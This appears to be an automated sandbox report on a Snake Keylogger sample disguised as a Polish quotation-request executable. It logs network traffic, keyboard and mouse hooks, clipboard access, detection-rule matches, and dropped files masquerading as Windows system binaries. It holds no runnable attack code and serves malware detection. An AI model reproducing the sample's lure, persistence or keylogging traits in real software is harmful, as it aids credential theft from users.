                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60642
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60520
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60641
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60640
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60760
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60529
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60528
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60649
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60527
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60648
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60472 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60647
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60768
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60525
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60646
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60524
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60642 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60645
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60523
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60644
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60522
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60643
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60764
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60617 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60498
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60497
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60496
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60452 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60495
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60494
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60493
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60492
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60532 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60664 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60475 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60498 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60641 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60503 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60555 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60463 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60514 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60590 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60566 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60732 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60606 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60525 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60502 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60720 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60544 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60708 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60487 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60630 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60567 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60756 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60652 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60578 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60618 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60533 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60629 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60663 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60476 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60589 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60485 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60556 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60651 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60579 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60455
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60576
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60575
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60696
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60453
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60574
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60452
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60513 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60573
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60571
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60591 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60692
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60570
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60459
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60458
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60579
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60457
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60578
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60456
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60577
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60524 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60545 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60580 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60590
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60616 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60466
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60587
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60465
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60586
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60453 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60464
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60585
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60463
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60584
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60462
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60461
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60582
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60460
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60581
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60580
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60627 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60640 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60474 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60469
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60468
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60589
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60467
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60588
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60480
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60464 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60477
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60598
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60476
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60597
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60475
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60596
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60474
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60595
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60473
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60594
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60472
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60534 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60593
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60471
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60557 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60592
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60470
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60591
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60628 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60662 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60478
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60599
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60605 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60501 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60491
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60639 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60490
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60744 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60486 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60488
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60487
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60486
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60485
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60484
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60483
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60482
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60481
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60497 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60568 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60489
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60466 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60523 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60684 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60546 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60489 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60500 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60764 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60649 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60603 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60569 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60593 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60637 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60650 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60535 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60696 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60478 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60592 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60638 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60728 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60672 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60511 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60465 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60490 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60740 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60547 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60570 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60522 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60776 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60558 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60581 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60604 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60659 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60571 -> 443
                    Source: unknownHTTPS traffic detected: 51.81.194.202:443 -> 192.168.2.5:49719 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.5:49724 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:49729 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49733 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 40.69.42.241:443 -> 192.168.2.5:60455 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.5:60467 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.5:60480 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.5:60489 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Source: C:\Users\user\Desktop\ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeWindows user hook set: 6176 mouse C:\Windows\SYSTEM32\MSVBVM60.DLLJump to behavior
                    Source: C:\Users\user\AppData\Local\icsys.icn.exeWindows user hook set: 6468 mouse C:\Windows\SYSTEM32\MSVBVM60.DLLJump to behavior
                    Source: C:\Windows\System\explorer.exeWindows user hook set: 6568 mouse C:\Windows\SYSTEM32\MSVBVM60.DLLJump to behavior
                    Source: C:\Windows\System\explorer.exeWindows user hook set: 0 keyboard low level c:\windows\system\explorer.exeJump to behavior
                    Source: C:\Windows\System\explorer.exeWindows user hook set: 0 mouse low level c:\windows\system\explorer.exeJump to behavior
                    Source: C:\Windows\System\spoolsv.exeWindows user hook set: 2704 mouse C:\Windows\SYSTEM32\MSVBVM60.DLLJump to behavior
                    Source: C:\Windows\System\svchost.exeWindows user hook set: 6596 mouse C:\Windows\SYSTEM32\MSVBVM60.DLLJump to behavior
                    Source: C:\Windows\System\spoolsv.exeWindows user hook set: 432 mouse C:\Windows\SYSTEM32\MSVBVM60.DLL
                    Source: C:\Windows\System\explorer.exeWindows user hook set: 7808 mouse C:\Windows\SYSTEM32\MSVBVM60.DLL
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_0046C5D0 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,1_2_0046C5D0
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_00459FFF OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,1_2_00459FFF
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_0046C5D0 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,1_2_0046C5D0
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_00456354 GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW,1_2_00456354
                    Source: C:\Windows\System\explorer.exeWindows user hook set: 0 mouse low level c:\windows\system\explorer.exeJump to behavior
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_0047C08E SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,1_2_0047C08E
                    Source: at.exeProcess created: 52

                    System Summary

                    barindex
                    Source: 1.2.zapytanie ofertowe st-2024-s315 cpa9170385.exe .3b00000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 1.2.zapytanie ofertowe st-2024-s315 cpa9170385.exe .3b00000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 1.2.zapytanie ofertowe st-2024-s315 cpa9170385.exe .3b00000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 10.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 1.2.zapytanie ofertowe st-2024-s315 cpa9170385.exe .3b00000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 1.2.zapytanie ofertowe st-2024-s315 cpa9170385.exe .3b00000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 1.2.zapytanie ofertowe st-2024-s315 cpa9170385.exe .3b00000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 00000001.00000002.2058258965.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000001.00000002.2058258965.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 00000001.00000002.2058258965.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0000000A.00000002.4483583747.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: zapytanie ofertowe st-2024-s315 cpa9170385.exe PID: 1088, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: RegSvcs.exe PID: 5568, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    Source: icsys.icn.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    Source: explorer.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    Source: spoolsv.exe.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    Source: mrsys.exe.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    Source: svchost.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    Source: stsys.exe.6.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_00434D50: GetFullPathNameW,__swprintf,_wcslen,_wcslen,_wcslen,CreateDirectoryW,CreateFileW,_memset,_wcslen,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,1_2_00434D50
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_004461ED _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,1_2_004461ED
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Code function: 1_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,1_2_004364AA
                    Source: C:\Users\user\AppData\Local\icsys.icn.exeFile created: c:\windows\system\explorer.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\icsys.icn.exeFile created: c:\windows\system\explorer.exeJump to behavior
                    Source: C:\Windows\System\explorer.exeFile created: c:\windows\system\spoolsv.exeJump to behavior
                    Source: C:\Windows\System\explorer.exeFile created: C:\Windows\system\cmsys.cmnJump to behavior
                    Source: C:\Windows\System\explorer.exeFile created: C:\Windows\system\cmsys.cmnJump to behavior
                    Source: C:\Windows\System\explorer.exeFile created: C:\Windows\system\cmsys.cmnJump to behavior
                    Source: C:\Windows\System\explorer.exeFile created: C:\Windows\system\cmsys.cmnJump to behavior
                    Source: C:\Windows\System\explorer.exeFile created: C:\Windows\system\cmsys.cmnJump to behavior
                    Source: C:\Windows\System\explorer.exeFile created: C:\Windows\system\cmsys.cmnJump to behavior
                    Source: C:\Windows\System\explorer.exeFile created: C:\Windows\system\cmsys.cmnJump to behavior
                    Source: C:\Windows\System\explorer.exeFile created: C:\Windows\system\cmsys.cmnJump to behavior
                    Source: C:\Windows\System\explorer.exeFile created: C:\Windows\system\cmsys.cmnJump to behavior
                    Source: C:\Windows\System\explorer.exeFile created: C:\Windows\system\cmsys.cmnJump to behavior
                    Source: C:\Windows\System\explorer.exeFile created: C:\Windows\system\cmsys.cmnJump to behavior
                    Source: C:\Windows\System\explorer.exeFile created: C:\Windows\system\cmsys.cmnJump to behavior
                    Source: C:\Windows\System\explorer.exeFile created: C:\Windows\system\cmsys.cmnJump to behavior
                    Source: C:\Windows\System\explorer.exeFile created: C:\Windows\system\cmsys.cmnJump to behavior
                    Source: C:\Windows\System\explorer.exeFile created: C:\Windows\system\cmsys.cmnJump to behavior
                    Source: C:\Windows\System\explorer.exeFile created: C:\Windows\system\cmsys.cmnJump to behavior
                    Source: C:\Windows\System\explorer.exeFile created: C:\Windows\system\cmsys.cmnJump to behavior
                    Source: C:\Windows\System\explorer.exeFile created: C:\Windows\system\cmsys.cmnJump to behavior
                    Source: C:\Windows\System\explorer.exeFile created: C:\Windows\system\cmsys.cmnJump to behavior
                    Source: C:\Windows\System\explorer.exeFile created: C:\Windows\system\cmsys.cmnJump to behavior
                    Source: C:\Windows\System\explorer.exeFile created: C:\Windows\system\cmsys.cmnJump to behavior
                    Source: C:\Windows\System\explorer.exeFile created: C:\Windows\system\cmsys.cmnJump to behavior
                    Source: C:\Windows\System\explorer.exeFile created: C:\Windows\system\cmsys.cmnJump to behavior
                    Source: C:\Windows\System\explorer.exeFile created: C:\Windows\system\cmsys.cmnJump to behavior
                    Source: C:\Windows\System\explorer.exeFile created: C:\Windows\system\cmsys.cmnJump to behavior
                    Source: C:\Windows\System\explorer.exeFile created: C:\Windows\system\cmsys.cmnJump to behavior
                    Source: C:\Windows\System\explorer.exeFile created: C:\Windows\system\cmsys.cmnJump to behavior
                    Source: C:\Windows\System\spoolsv.exeFile created: c:\windows\system\svchost.exeJump to behavior
                    Source: C:\Windows\System\spoolsv.exeFile created: c:\windows\system\svchost.exeJump to behavior
                    Source: C:\Windows\System\svchost.exeFile created: C:\Windows\system\cmsys.cmnJump to behavior
                    Source: C:\Users\user\AppData\Local\icsys.icn.exeFile deleted: C:\Windows\System\explorer.exeJump to behavior
